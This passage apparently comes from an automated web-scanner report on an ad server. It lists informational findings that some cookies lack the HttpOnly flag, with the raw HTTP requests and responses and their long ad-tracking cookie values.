bh="b!!!%0!!!?H!!!!%<wR0_!!*oY!!!!'<ypn'!!-?2!!!!-<ypn'!!-G2!!!!$<w[UB!!-yu!!!!.<vm`$!!.+B!!!!.<vm`%!!.tS!!!!(<ypn'!!0O4!!!!)<y]81!!0O<!!!!/<y]81!!0P,!!!!#<x4hf!!1Mv!!!!$<y45e!!2(j!!!!/<whqI!!4Qs!!!!%<wle3!!=cS!!!!'<yV[r!!?VS!!B1c<xl.o!!J<=!!!!/<y]81!!J<E!!!!/<y]81!!J>I!!!!#<x)TA!!L(^!!!!$<xD>X!!LHY!!!!.<whoV!!L[f!!!!#<wYl+!!ONX!!!!#<wle$!!ObA!!!!(<ypn'!!PL`!!!!$<y461!!RZ(!!!!)<xt,H!!VQ(!!!!#<wYkr!!Zwb!!!!%<ypn'!!`4u!!!!%<y66/!!dNP!!!!%<x+rS!!g5o!!!!'<wsq+!!iV_!!!!%<wsq-!!i[%!!!!#<x4hf!!ita!!!!0<y]81!!q:E!!!!-<y]81!!q<+!!!!.<y]81!!q</!!!!.<y]81!!q<3!!!!.<y]81!!r^4!!!!(<x+rV!!r^5!!!!#<x*ig!!tjQ!!!!(<ypn'!!ucq!!!!/<y]81!!vRm!!!!)<y]81!!vRq!!!!)<y]81!!vRr!!!!)<y]81!!vRw!!!!/<y]81!!vRx!!!!)<y]81!!vRy!!!!)<y]81!!w3l!!!!(<ypn'!!wQ3!!!!(<ypn'!!wQ5!!!!(<ypn'!!wcu!!!!#<xCAG!!wq:!!!!#<xCAF!!xX$!!!!#<x(sS!!xX+!!!!#<x(rt!!y!r!!!!)<y]81!##^t!!!!#<wYoF!#'uj!!!!#<wsgD!#*Xb!!!!#<yMiw!#*Xc!!!!#<xE(*!#+<r!!!!#<wO:5!#+di!!!!#<xYi<!#+dj!!!!#<xYi<!#+dk!!!!#<xYi<!#-B#!!!!#<wsXA!#-H0!!!!#<wleD!#.dO!!!!+<xt,H!#1*C!!!!%<ypn'!#27)!!!!+<x+rW!#2RS!!!!#<x9#3!#2Rn~~!#2XY!!!!)<y]8:!#2YX!!!!#<vl)_!#3>J!!!!#<x(U)!#3g6!!!!#<w>/l!#3pS!!!!#<x31-!#3pv!!!!#<wsXA!#44f!!!!)<y]81!#48w!!2s=<xrZD!#4`K!!!!#<x2wq!#5(U!!!!#<x,:<!#5(^!!!!#<x31-!#5(a!!!!#<x3.t!#5[N!!!!#<vl)_!#5kt!!!!#<x)TA!#5nZ!!!!)<y]81!#7.'!!!!)<y]81!#7.:!!!!)<y]81!#7.O!!!!)<y]81!#8>*!!!!#<x2wq!#8Mo!!!!#<wle%!#8tG!!!!#<wsq,!#=-g!!!!#<xi5p!#KjQ!!B1c<xl.o!#Km/!!!!#<xl/o!#L]q!!!!#<w>/s!#MHv!!!!$<w>/n!#MTC!!!!)<y]81!#MTF!!!!)<y]81!#MTH!!!!)<y]81!#MTI!!!!)<y]81!#MTJ!!!!)<y]81!#MTK!!!!#<w>/m!#M]c!!!!)<xt,H!#Mr7!!!!#<w>/l!#N44~~!#N45!!!!#<xr]M!#O29!!!!%<ypn'!#O>d!!C`.<xrYg!#SCj!!!!+<xt,H!#SCk!!!!+<xt,H!#SEm!!!!/<y]81!#SF3!!!!/<y]81!#T,d!!!!#<wsXA!#T8R!!!!#<x+I0!#TnE!!!!)<y]81!#UDP!!!!/<y]81!#UZs!!!!#<yjEy!#U_(!!!!*<wleI!#V7#!!!!#<x,:<!#V8a!!!!#<xq_s!#VEP!!!!#<wleE!#VO3!!!!#<xq_q!#Wb^!!C`.<xrYg!#X8Y!!!!#<xr]M!#XI8!!!!#<xL%*!#YCg!!!!#<x2wq!#Z8A!!!!%<ypn'!#ZPp!!!!#<y,`,!#[L>!!!!%<w[UA!#]%`!!!!$<xtBW!#]@s!!!!%<whqH!#]Z!!!!!%<ypn'!#^@9!!!!#<x2wq!#^bt!!!!%<xr]Q!#^d6!!!!$<xtBW!#`-7!!!!%<ypn'!#`S2!!!!(<ypn'!#`U0!!!!'<ypn'!#`U9!!!!%<ypn'!#a'?!!!!#<w>/m!#a4,!!!!#<y,`,!#a=6!!!!'<ypn'!#a=7!!!!'<ypn'!#a=9!!!!'<ypn'!#a=P!!!!'<ypn'!#aCq!!!!(<w[U@!#aG>!!!!+<xt,H!#ah!!!!!)<y]81!#ai7!!!!)<y]81!#ai?!!!!)<y]81!#b:Z!!!!#<x2wq!#b<_!!!!#<x3.t!#b<`!!!!#<x,:<!#b<a!!!!#<x,:<!#b='!!!!#<x3.t!#b=*!!!!#<x,:<!#b=E!!!!#<x31-!#b=F!!!!#<x3.t!#b@%!!!!#<wsXA!#bGi!!!!#<xr]M!#c-u!!!!-<w*F]!#c8V!!!!%<ypn'!#c8W!!!!%<ypn'!#c8X!!!!%<ypn'!#c8]!!!!%<ypn'!#c?c!!!!)<y]81!#ddE!!!!#<xYi>!#e(g!!!!#<xE(*!#e9?!!!!#<y,`,!#e@T!!!!#<ypn:!#eLS!!!!#<yjEE!#ePa!!!!#<xr]M!#eaO!!!!+<xt,H!#ec)!!!!%<x+rF!#fG)!!!!%<ypn'!#fG+!!!!'<ypn'!#g=!!!!!%<ypn'!#g]5!!!!)<xdAS!#gig!!!!#<xt+`!#gsr~~!#h.N!!!!#<yMiw!#k]4~~!#l)E!!!!#<y,`,!#mP5!!!!$<w[UB!#mP6!!!!$<w[UB!#ne_!!!!%<ypn'!#ni8!!!!#<x*cS!#p6E!!!!%<wleK!#p6Z!!!!#<wle8!#p7'!!!!#<yMiw!#p]R!!!!#<wsXA!#p]T!!!!#<wsXA!#q),!!!!#<wO:5!#q2T!!!!.<whoV!#q2U!!!!.<whoV!#q9]!!!!#<waw+!#qx3!!!!#<wGkF!#qx4!!!!#<wGk*!#r:A!!!!#<waw,!#r<X!!!!#<x+I@!#rVR!!!!)<y]81!#sAb!!!!$<y46(!#sAc!!!!$<y46(!#sC4!!!!$<y46(!#sax!!!!#<xd-C!#tLy!!!!)<y]81!#tM)!!!!)<y]81!#tn2!!!!)<y]81!#uE=!!!!#<x9#K!#uJY!!!!/<y]81!#uR3!!!!%<ypn'!#ujQ!!!!%<ypn'!#ust!!!!+<xt,H!#usu!!!!+<xt,H!#v,Y!!!!#<x2wq!#v,Z!!!!#<xt>i!#vyX!!!!)<y]81!#w!v!!!!#<wsXA!#wGj!!!!#<wle$!#wGm!!!!#<wle$!#wW9!!!!+<xt,H!#wnK!!!!)<xt,H!#wnM!!!!)<xt,H!#wot!!!!#<xt>i!#xI*!!!!+<xt,H!#xIF!!!!,<y]81!#yM#!!!!+<xt,H!#yX.!!!!9<w*F[!$!8/!!!!#<xl.y!$!:w~~!$!:x!!!!#<xr]M!$!>x!!!!*<wjBg!$!_`!!!!#<y,`,!$#3q!!!!(<x+Z1!$#B>!!!!$<ypn'!$#R7!!!!)<y]81!$#S3!!!!#<y,`,!$#WA!!!!+<xt,H!$$K<!!!!$<wleJ!$$L.!!!!#<w[Sh!$$L/!!!!#<w[Sh!$$L0!!!!#<w[Sh!$$LE!!!!#<w[_a!$$LL!!!!$<w[_f!$$R]!!!!#<xl/)!$$j2!!!!#<xKwk!$$p*!!!!#<wUv4!$%,!!!!!+<xt,H!$%,J!!!!#<x2wq!$%SB!!!!+<xt,H!$%Uy!!!!#<w>/l!$%gQ!!!!#<y,`,!$'/1!!!!#<wx=%!$'Z-!!!!)<y]81!$(!P!!!!(<ypn'!$(+N!!!!#<wGkB!$(Gt!!!!,<y]81!$(S9!!!!%<ypn'!$(Tb!!!!#<yQLc!$(V0!!!!%<y*E<!$)>0!!!!#<xqaf!$)DE!!!!#<xr]M!$)DI~~!$)GB!!!!(<ypn'!$*R!!!!!%<xr]Q!$*a0!!!!'<xt,H!$*bX!!!!#<xr]Q!$*hf!!!!%<ypn'"; BX=8khj7j56qmjsh&b=4&s=dk&t=106

Response

HTTP/1.1 200 OK
Date: Mon, 09 May 2011 14:00:11 GMT
Server: YTS/1.18.4
P3P: policyref="/w3c/p3p.xml", CP="NOI DSP COR NID CURa ADMa DEVa PSAa PSDa OUR BUS COM INT OTC PUR STA"
X-RightMedia-Hostname: raptor0313.rm.bf1
Set-Cookie: ih="b!!!!@!)Tt+!!!!#<wYoD!)`Tm!!!!#<vmX7!)`Tq!!!!#<vmX5!)`U6!!!!#<vmX0!*loT!!!!#<vl)_!,+Z*!!!!$<xl/w!/Iw4!!!!#<wF]1!/U5t!!!!#<xu,P!/YG?!!!!#<xt+b!/_KY!!!!#<vl)T!/h[p!!!!#<vl)[!/iq6!!!!$<vmX=!/iq@!!!!$<vm`!!/iqB!!!!#<vmTN!/iqH!!!!#<vmTH!024(!!!!#<ypnC!0eUu!!!!#<y]8.!0ji6!!!!'<xqS_!0ji7!!!!%<xqRm!1EYJ!!!!#<wUv<!1M!9!!!!$<wF]9!1NgF!!!!#<xt,P!1Z!K!!!!#<xt]R!1`)_!!!!#<wYiT!1kC+!!!!%<xqSY!1kC5!!!!#<xqR`!1kC<!!!!#<xqQb!1kDI!!!!#<xqQM"; path=/; expires=Wed, 08-May-2013 14:00:11 GMT
Set-Cookie: vuday1=qtDL:!1e0g7s@DV; path=/; expires=Tue, 10-May-2011 00:00:00 GMT
Set-Cookie: pv1="b!!!!$!#3yC!,Y+@!$Xwq!1`)_!%bq`!!!!$!?5%!$U=A2!w1K*!%4fo!$k7.!'pCX~~~~~<wYiT=#mS_~!#M*E!*:n8!$8TB!024(!%:2h!!!!$!?5%!%5F4/!wDW,!%Ua]!%]N-!'>cc~~~~~<ypnC=!oT]~"; path=/; expires=Wed, 08-May-2013 14:00:11 GMT
Set-Cookie: BX=8khj7j56qmjsh&b=4&s=dk&t=106; path=/; expires=Tue, 19-Jan-2038 03:14:07 GMT
Set-Cookie: lifb=>MqpcP`!q)8ZvPC; path=/; expires=Mon, 09-May-2011 16:00:11 GMT
Cache-Control: no-store
Last-Modified: Mon, 09 May 2011 14:00:11 GMT
Pragma: no-cache
Content-Length: 3250
Content-Type: text/html
Age: 0
Proxy-Connection: close

<html><body style="margin-left: 0%; margin-right: 0%; margin-top: 0%; margin-bottom: 0%"><script type="text/javascript">if (window.rm_crex_data) {rm_crex_data.push(8093450);}
</script><iframe src="htt
...[SNIP]...
10.12. http://ad.yieldmanager.com/imp  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://ad.yieldmanager.com
Path:   /imp

Issue detail

The following cookie was issued by the application and does not have the HttpOnly flag set:The cookie does not appear to contain a session token, which may reduce the risk associated with this issue. You should review the contents of the cookie to determine its function.

Request

GET /imp?Z=468x60&s=1384085&_salt=2430113711&B=10&u=http%3A%2F%2Fwww.surphace.com%2Fads%2Frubicon_orlandosentinel&r=0 HTTP/1.1
Host: ad.yieldmanager.com
Proxy-Connection: keep-alive
Referer: http://ad.yieldmanager.com/st?ad_type=iframe&ad_size=468x60&section=1384085
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.24 (KHTML, like Gecko) Chrome/11.0.696.65 Safari/534.24
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: uid=uid=888a2c66-6932-11e0-8830-001b24783b20&_hmacv=1&_salt=4113190855&_keyid=k1&_hmac=2bd08a6ff17f1fdebe5379daa4d53c1f64bef7b8; pv1="b!!!!-!#3yC!,Y+@!$Xwq!1`)_!%bq`!!!!$!?5%!$U=A2!w1K*!%4fo!$k7.!'pCX~~~~~<wYiT=#mS_~!!J<[!,M,<!$LQ^!,+Z*!$%hK~!#1g.)di=:!ZmB)!%mdT!$hK:~~~~~~<xl/w<y-(rM.jTN!!L7_!,M,<!$LQ^!,+Z*!$%hK~!#1g.)di=:!ZmB)!%mdT!$hK:~~~~~~<xl/w<yjn9M.jTN!#mP:!!#f?!#>u3!1Z!K!%au=!!!!$!?5%!'jyc4!wVd.!$Tvl!#SxE!'o2l~~~~~<xt]R<y5UM!!!#G!#mP>!!#f?!#>u3!1Z!K!%au=!!!!$!?5%!'jyc4!wVd.!$Tvl!#SxE!'o2l~~~~~<xt]R<y5UM!!!#G!#mPA!!#f?!#>u3!1Z!K!%au=!!!!$!?5%!'jyc4!wVd.!$Tvl!#SxE!'o2l~~~~~<xt]R<y5UM!!!#G!#mPD!!#f?!#>u3!1Z!K!%au=!!!!$!?5%!'jyc4!wVd.!$Tvl!#SxE!'o2l~~~~~<xt]R<y5UM!!!#G!#mPG!!#f?!#>u3!1Z!K!%au=!!!!$!?5%!'jyc4!wVd.!$Tvl!#SxE!'o2l~~~~~<xt]R<y5UM!!!#G!#mPJ!!#f?!#>u3!1Z!K!%au=!!!!$!?5%!'jyc4!wVd.!$Tvl!#SxE!'o2l~~~~~<xt]R<y5UM!!!#G!#p!r!!#f?!#>u3!1Z!K!%au=!!!!$!?5%!'jyc4!wVd.!$Tvl!#SxE!'o2l~~~~~<xt]R<xtrb!!.vL"; ih="b!!!!?!)Tt+!!!!#<wYoD!)`Tm!!!!#<vmX7!)`Tq!!!!#<vmX5!)`U6!!!!#<vmX0!*loT!!!!#<vl)_!,+Z*!!!!$<xl/w!/Iw4!!!!#<wF]1!/U5t!!!!#<xu,P!/YG?!!!!#<xt+b!/_KY!!!!#<vl)T!/h[p!!!!#<vl)[!/iq6!!!!$<vmX=!/iq@!!!!$<vm`!!/iqB!!!!#<vmTN!/iqH!!!!#<vmTH!0eUu!!!!#<y]8.!0ji6!!!!'<xqS_!0ji7!!!!%<xqRm!1EYJ!!!!#<wUv<!1M!9!!!!$<wF]9!1NgF!!!!#<xt,P!1Z!K!!!!#<xt]R!1`)_!!!!#<wYiT!1kC+!!!!%<xqSY!1kC5!!!!#<xqR`!1kC<!!!!#<xqQb!1kDI!!!!#<xqQM"; bh="b!!!%/!!!?H!!!!%<wR0_!!*oY!!!!'<ypn'!!-?2!!!!-<ypn'!!-G2!!!!$<w[UB!!-yu!!!!.<vm`$!!.+B!!!!.<vm`%!!.tS!!!!(<ypn'!!0O4!!!!)<y]81!!0O<!!!!/<y]81!!0P,!!!!#<x4hf!!1Mv!!!!$<y45e!!2(j!!!!/<whqI!!4Qs!!!!%<wle3!!=cS!!!!'<yV[r!!?VS!!B1c<xl.o!!J<=!!!!/<y]81!!J<E!!!!/<y]81!!J>I!!!!#<x)TA!!L(^!!!!$<xD>X!!LHY!!!!.<whoV!!L[f!!!!#<wYl+!!ONX!!!!#<wle$!!ObA!!!!(<ypn'!!PL`!!!!$<y461!!RZ(!!!!)<xt,H!!VQ(!!!!#<wYkr!!Zwb!!!!%<ypn'!!`4u!!!!%<y66/!!dNP!!!!%<x+rS!!g5o!!!!'<wsq+!!iV_!!!!%<wsq-!!i[%!!!!#<x4hf!!ita!!!!0<y]81!!q:E!!!!-<y]81!!q<+!!!!.<y]81!!q</!!!!.<y]81!!q<3!!!!.<y]81!!r^4!!!!(<x+rV!!r^5!!!!#<x*ig!!tjQ!!!!(<ypn'!!ucq!!!!/<y]81!!vRm!!!!)<y]81!!vRq!!!!)<y]81!!vRr!!!!)<y]81!!vRw!!!!/<y]81!!vRx!!!!)<y]81!!vRy!!!!)<y]81!!w3l!!!!(<ypn'!!wQ3!!!!(<ypn'!!wQ5!!!!(<ypn'!!wcu!!!!#<xCAG!!wq:!!!!#<xCAF!!xX$!!!!#<x(sS!!xX+!!!!#<x(rt!!y!r!!!!)<y]81!##^t!!!!#<wYoF!#'uj!!!!#<wsgD!#*Xb!!!!#<yMiw!#*Xc!!!!#<xE(*!#+<r!!!!#<wO:5!#+di!!!!#<xYi<!#+dj!!!!#<xYi<!#+dk!!!!#<xYi<!#-B#!!!!#<wsXA!#-H0!!!!#<wleD!#.dO!!!!+<xt,H!#1*C!!!!%<ypn'!#27)!!!!+<x+rW!#2RS!!!!#<x9#3!#2Rn!!!!#<x2wq!#2XY!!!!)<y]8:!#2YX!!!!#<vl)_!#3>J!!!!#<x(U)!#3g6!!!!#<w>/l!#3pS!!!!#<x31-!#3pv!!!!#<wsXA!#44f!!!!)<y]81!#48w!!2s=<xrZD!#4`K!!!!#<x2wq!#5(U!!!!#<x,:<!#5(^!!!!#<x31-!#5(a!!!!#<x3.t!#5[N!!!!#<vl)_!#5kt!!!!#<x)TA!#5nZ!!!!)<y]81!#7.'!!!!)<y]81!#7.:!!!!)<y]81!#7.O!!!!)<y]81!#8>*!!!!#<x2wq!#8Mo!!!!#<wle%!#8tG!!!!#<wsq,!#=-g!!!!#<xi5p!#KjQ!!B1c<xl.o!#Km/!!!!#<xl/o!#L]q!!!!#<w>/s!#MHv!!!!$<w>/n!#MTC!!!!)<y]81!#MTF!!!!)<y]81!#MTH!!!!)<y]81!#MTI!!!!)<y]81!#MTJ!!!!)<y]81!#MTK!!!!#<w>/m!#M]c!!!!)<xt,H!#Mr7!!!!#<w>/l!#N44!!!!#<x2wq!#N45!!!!#<xr]M!#O29!!!!%<ypn'!#O>d!!C`.<xrYg!#SCj!!!!+<xt,H!#SCk!!!!+<xt,H!#SEm!!!!/<y]81!#SF3!!!!/<y]81!#T,d!!!!#<wsXA!#T8R!!!!#<x+I0!#TnE!!!!)<y]81!#UDP!!!!/<y]81!#UZs!!!!#<yjEy!#U_(!!!!*<wleI!#V7#!!!!#<x,:<!#V8a!!!!#<xq_s!#VEP!!!!#<wleE!#VO3!!!!#<xq_q!#Wb^!!C`.<xrYg!#X8Y!!!!#<xr]M!#XI8!!!!#<xL%*!#YCg!!!!#<x2wq!#Z8A!!!!%<ypn'!#ZPp!!!!#<y,`,!#[L>!!!!%<w[UA!#]%`!!!!$<xtBW!#]@s!!!!%<whqH!#]Z!!!!!%<ypn'!#^@9!!!!#<x2wq!#^bt!!!!%<xr]Q!#^d6!!!!$<xtBW!#`-7!!!!%<ypn'!#`S2!!!!(<ypn'!#`U0!!!!'<ypn'!#`U9!!!!%<ypn'!#a'?!!!!#<w>/m!#a4,!!!!#<y,`,!#a=6!!!!'<ypn'!#a=7!!!!'<ypn'!#a=9!!!!'<ypn'!#a=P!!!!'<ypn'!#aCq!!!!(<w[U@!#aG>!!!!+<xt,H!#ah!!!!!)<y]81!#ai7!!!!)<y]81!#ai?!!!!)<y]81!#b:Z!!!!#<x2wq!#b<_!!!!#<x3.t!#b<`!!!!#<x,:<!#b<a!!!!#<x,:<!#b='!!!!#<x3.t!#b=*!!!!#<x,:<!#b=E!!!!#<x31-!#b=F!!!!#<x3.t!#b@%!!!!#<wsXA!#bGi!!!!#<xr]M!#c-u!!!!-<w*F]!#c8V!!!!%<ypn'!#c8W!!!!%<ypn'!#c8X!!!!%<ypn'!#c8]!!!!%<ypn'!#c?c!!!!)<y]81!#ddE!!!!#<xYi>!#e(g!!!!#<xE(*!#e9?!!!!#<y,`,!#eLS!!!!#<yjEE!#ePa!!!!#<xr]M!#eaO!!!!+<xt,H!#ec)!!!!%<x+rF!#fG)!!!!%<ypn'!#fG+!!!!'<ypn'!#g=!!!!!%<ypn'!#g]5!!!!)<xdAS!#gig!!!!#<xt+`!#gsr!!!!#<x2wq!#h.N!!!!#<yMiw!#k]4!!!!#<x2wq!#l)E!!!!#<y,`,!#mP5!!!!$<w[UB!#mP6!!!!$<w[UB!#ne_!!!!%<ypn'!#ni8!!!!#<x*cS!#p6E!!!!%<wleK!#p6Z!!!!#<wle8!#p7'!!!!#<yMiw!#p]R!!!!#<wsXA!#p]T!!!!#<wsXA!#q),!!!!#<wO:5!#q2T!!!!.<whoV!#q2U!!!!.<whoV!#q9]!!!!#<waw+!#qx3!!!!#<wGkF!#qx4!!!!#<wGk*!#r:A!!!!#<waw,!#r<X!!!!#<x+I@!#rVR!!!!)<y]81!#sAb!!!!$<y46(!#sAc!!!!$<y46(!#sC4!!!!$<y46(!#sax!!!!#<xd-C!#tLy!!!!)<y]81!#tM)!!!!)<y]81!#tn2!!!!)<y]81!#uE=!!!!#<x9#K!#uJY!!!!/<y]81!#uR3!!!!%<ypn'!#ujQ!!!!%<ypn'!#ust!!!!+<xt,H!#usu!!!!+<xt,H!#v,Y!!!!#<x2wq!#v,Z!!!!#<xt>i!#vyX!!!!)<y]81!#w!v!!!!#<wsXA!#wGj!!!!#<wle$!#wGm!!!!#<wle$!#wW9!!!!+<xt,H!#wnK!!!!)<xt,H!#wnM!!!!)<xt,H!#wot!!!!#<xt>i!#xI*!!!!+<xt,H!#xIF!!!!,<y]81!#yM#!!!!+<xt,H!#yX.!!!!9<w*F[!$!8/!!!!#<xl.y!$!:w!!!!#<x2wq!$!:x!!!!#<xr]M!$!>x!!!!*<wjBg!$!_`!!!!#<y,`,!$#3q!!!!(<x+Z1!$#B>!!!!$<ypn'!$#R7!!!!)<y]81!$#S3!!!!#<y,`,!$#WA!!!!+<xt,H!$$K<!!!!$<wleJ!$$L.!!!!#<w[Sh!$$L/!!!!#<w[Sh!$$L0!!!!#<w[Sh!$$LE!!!!#<w[_a!$$LL!!!!$<w[_f!$$R]!!!!#<xl/)!$$j2!!!!#<xKwk!$$p*!!!!#<wUv4!$%,!!!!!+<xt,H!$%,J!!!!#<x2wq!$%SB!!!!+<xt,H!$%Uy!!!!#<w>/l!$%gQ!!!!#<y,`,!$'/1!!!!#<wx=%!$'Z-!!!!)<y]81!$(!P!!!!(<ypn'!$(+N!!!!#<wGkB!$(Gt!!!!,<y]81!$(S9!!!!%<ypn'!$(Tb!!!!#<yQLc!$(V0!!!!%<y*E<!$)>0!!!!#<xqaf!$)DE!!!!#<xr]M!$)DI!!!!#<x2wq!$)GB!!!!(<ypn'!$*R!!!!!%<xr]Q!$*a0!!!!'<xt,H!$*bX!!!!#<xr]Q!$*hf!!!!%<ypn'"; BX=8khj7j56qmjsh&b=4&s=dk&t=106

Response

HTTP/1.1 200 OK
Date: Mon, 09 May 2011 14:00:10 GMT
Server: YTS/1.18.4
P3P: policyref="/w3c/p3p.xml", CP="NOI DSP COR NID CURa ADMa DEVa PSAa PSDa OUR BUS COM INT OTC PUR STA"
X-RightMedia-Hostname: raptor0363.rm.bf1
Set-Cookie: BX=8khj7j56qmjsh&b=4&s=dk&t=106; path=/; expires=Tue, 19-Jan-2038 03:14:07 GMT
Cache-Control: no-store
Last-Modified: Mon, 09 May 2011 14:00:10 GMT
Pragma: no-cache
Content-Length: 927
Content-Type: application/x-javascript
Age: 0
Proxy-Connection: close

document.write('<iframe allowtransparency=\"true\" scrolling=\"no\" marginwidth=\"0\" marginheight=\"0\" frameborder=\"0\" height=\"60\" width=\"468\" src=\"http://ad.yieldmanager.com/iframe3?7DlEAJUe
...[SNIP]...
10.13. http://ad.yieldmanager.com/pixel  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://ad.yieldmanager.com
Path:   /pixel

Issue detail

The following cookies were issued by the application and do not have the HttpOnly flag set:The cookies do not appear to contain session tokens, which may reduce the risk associated with this issue. You should review the contents of the cookies to determine their function.

Request

GET /pixel?id=1274605&id=56918&id=315889&id=715901&id=1023315&id=725071&id=1268392&id=1198035&id=1049794&id=1238051&id=74560&id=593881&id=1264419&id=86237&id=926097&id=1006089&id=1196051&id=1147048&id=1086731&id=1284585&id=1086733&id=1044410&id=1093100&id=1063912&id=397181&id=1044578&id=1063916&id=1041270&id=1049769&id=1049770&id=596293&id=576685&id=1044587&id=596291&id=1049772&id=1063911&id=1063910&t=2 HTTP/1.1
Host: ad.yieldmanager.com
Proxy-Connection: keep-alive
Referer: http://www.floridatoday.com/article/20110508/NEWS01/105080319/Highly-publicized-murder-Caylee-Anthony-rivets-enrages
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.24 (KHTML, like Gecko) Chrome/11.0.696.65 Safari/534.24
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: uid=uid=888a2c66-6932-11e0-8830-001b24783b20&_hmacv=1&_salt=4113190855&_keyid=k1&_hmac=2bd08a6ff17f1fdebe5379daa4d53c1f64bef7b8; pv1="b!!!!-!#3yC!,Y+@!$Xwq!1`)_!%bq`!!!!$!?5%!$U=A2!w1K*!%4fo!$k7.!'pCX~~~~~<wYiT=#mS_~!!J<[!,M,<!$LQ^!,+Z*!$%hK~!#1g.)di=:!ZmB)!%mdT!$hK:~~~~~~<xl/w<y-(rM.jTN!!L7_!,M,<!$LQ^!,+Z*!$%hK~!#1g.)di=:!ZmB)!%mdT!$hK:~~~~~~<xl/w<yjn9M.jTN!#mP:!!#f?!#>u3!1Z!K!%au=!!!!$!?5%!'jyc4!wVd.!$Tvl!#SxE!'o2l~~~~~<xt]R<y5UM!!!#G!#mP>!!#f?!#>u3!1Z!K!%au=!!!!$!?5%!'jyc4!wVd.!$Tvl!#SxE!'o2l~~~~~<xt]R<y5UM!!!#G!#mPA!!#f?!#>u3!1Z!K!%au=!!!!$!?5%!'jyc4!wVd.!$Tvl!#SxE!'o2l~~~~~<xt]R<y5UM!!!#G!#mPD!!#f?!#>u3!1Z!K!%au=!!!!$!?5%!'jyc4!wVd.!$Tvl!#SxE!'o2l~~~~~<xt]R<y5UM!!!#G!#mPG!!#f?!#>u3!1Z!K!%au=!!!!$!?5%!'jyc4!wVd.!$Tvl!#SxE!'o2l~~~~~<xt]R<y5UM!!!#G!#mPJ!!#f?!#>u3!1Z!K!%au=!!!!$!?5%!'jyc4!wVd.!$Tvl!#SxE!'o2l~~~~~<xt]R<y5UM!!!#G!#p!r!!#f?!#>u3!1Z!K!%au=!!!!$!?5%!'jyc4!wVd.!$Tvl!#SxE!'o2l~~~~~<xt]R<xtrb!!.vL"; ih="b!!!!?!)Tt+!!!!#<wYoD!)`Tm!!!!#<vmX7!)`Tq!!!!#<vmX5!)`U6!!!!#<vmX0!*loT!!!!#<vl)_!,+Z*!!!!$<xl/w!/Iw4!!!!#<wF]1!/U5t!!!!#<xu,P!/YG?!!!!#<xt+b!/_KY!!!!#<vl)T!/h[p!!!!#<vl)[!/iq6!!!!$<vmX=!/iq@!!!!$<vm`!!/iqB!!!!#<vmTN!/iqH!!!!#<vmTH!0eUu!!!!#<y]8.!0ji6!!!!'<xqS_!0ji7!!!!%<xqRm!1EYJ!!!!#<wUv<!1M!9!!!!$<wF]9!1NgF!!!!#<xt,P!1Z!K!!!!#<xt]R!1`)_!!!!#<wYiT!1kC+!!!!%<xqSY!1kC5!!!!#<xqR`!1kC<!!!!#<xqQb!1kDI!!!!#<xqQM"; bh="b!!!%0!!!?H!!!!%<wR0_!!*oY!!!!%<yjL@!!-?2!!!!,<yjL@!!-G2!!!!$<w[UB!!-yu!!!!.<vm`$!!.+B!!!!.<vm`%!!.tS!!!!'<yjL@!!0O4!!!!)<y]81!!0O<!!!!/<y]81!!0P,!!!!#<x4hf!!1Mv!!!!$<y45e!!2(j!!!!/<whqI!!4Qs!!!!%<wle3!!=cS!!!!'<yV[r!!?VS!!B1c<xl.o!!J<=!!!!/<y]81!!J<E!!!!/<y]81!!J>I!!!!#<x)TA!!L(^!!!!$<xD>X!!LHY!!!!.<whoV!!L[f!!!!#<wYl+!!ONX!!!!#<wle$!!ObA!!!!'<yjL@!!PL`!!!!$<y461!!RZ(!!!!)<xt,H!!VQ(!!!!#<wYkr!!Zwb!!!!$<yjL@!!`4u!!!!%<y66/!!dNP!!!!%<x+rS!!g5o!!!!'<wsq+!!iV_!!!!%<wsq-!!i[%!!!!#<x4hf!!ita!!!!0<y]81!!q:E!!!!-<y]81!!q<+!!!!.<y]81!!q</!!!!.<y]81!!q<3!!!!.<y]81!!r^4!!!!(<x+rV!!r^5!!!!#<x*ig!!tjQ!!!!'<yjL@!!ucq!!!!/<y]81!!vRm!!!!)<y]81!!vRq!!!!)<y]81!!vRr!!!!)<y]81!!vRw!!!!/<y]81!!vRx!!!!)<y]81!!vRy!!!!)<y]81!!w3l!!!!'<yjL@!!wQ3!!!!'<yjL@!!wQ5!!!!'<yjL@!!wcu!!!!#<xCAG!!wq:!!!!#<xCAF!!xX$!!!!#<x(sS!!xX+!!!!#<x(rt!!y!r!!!!)<y]81!##^t!!!!#<wYoF!#'uj!!!!#<wsgD!#*Xb!!!!#<yMiw!#*Xc!!!!#<xE(*!#+<r!!!!#<wO:5!#+di!!!!#<xYi<!#+dj!!!!#<xYi<!#+dk!!!!#<xYi<!#-B#!!!!#<wsXA!#-H0!!!!#<wleD!#.dO!!!!+<xt,H!#1*C!!!!$<yjL@!#27)!!!!+<x+rW!#2RS!!!!#<x9#3!#2Rn!!!!#<x2wq!#2XY!!!!)<y]8:!#2YX!!!!#<vl)_!#3>J!!!!#<x(U)!#3_i~~!#3g6!!!!#<w>/l!#3pS!!!!#<x31-!#3pv!!!!#<wsXA!#44f!!!!)<y]81!#48w!!2s=<xrZD!#4`K!!!!#<x2wq!#5(U!!!!#<x,:<!#5(^!!!!#<x31-!#5(a!!!!#<x3.t!#5[N!!!!#<vl)_!#5kt!!!!#<x)TA!#5nZ!!!!)<y]81!#7.'!!!!)<y]81!#7.:!!!!)<y]81!#7.O!!!!)<y]81!#8>*!!!!#<x2wq!#8Mo!!!!#<wle%!#8tG!!!!#<wsq,!#=-g!!!!#<xi5p!#KjQ!!B1c<xl.o!#Km/!!!!#<xl/o!#L]q!!!!#<w>/s!#MHv!!!!$<w>/n!#MTC!!!!)<y]81!#MTF!!!!)<y]81!#MTH!!!!)<y]81!#MTI!!!!)<y]81!#MTJ!!!!)<y]81!#MTK!!!!#<w>/m!#M]c!!!!)<xt,H!#Mr7!!!!#<w>/l!#N44!!!!#<x2wq!#N45!!!!#<xr]M!#O29!!!!$<yjL@!#O>d!!C`.<xrYg!#SCj!!!!+<xt,H!#SCk!!!!+<xt,H!#SEm!!!!/<y]81!#SF3!!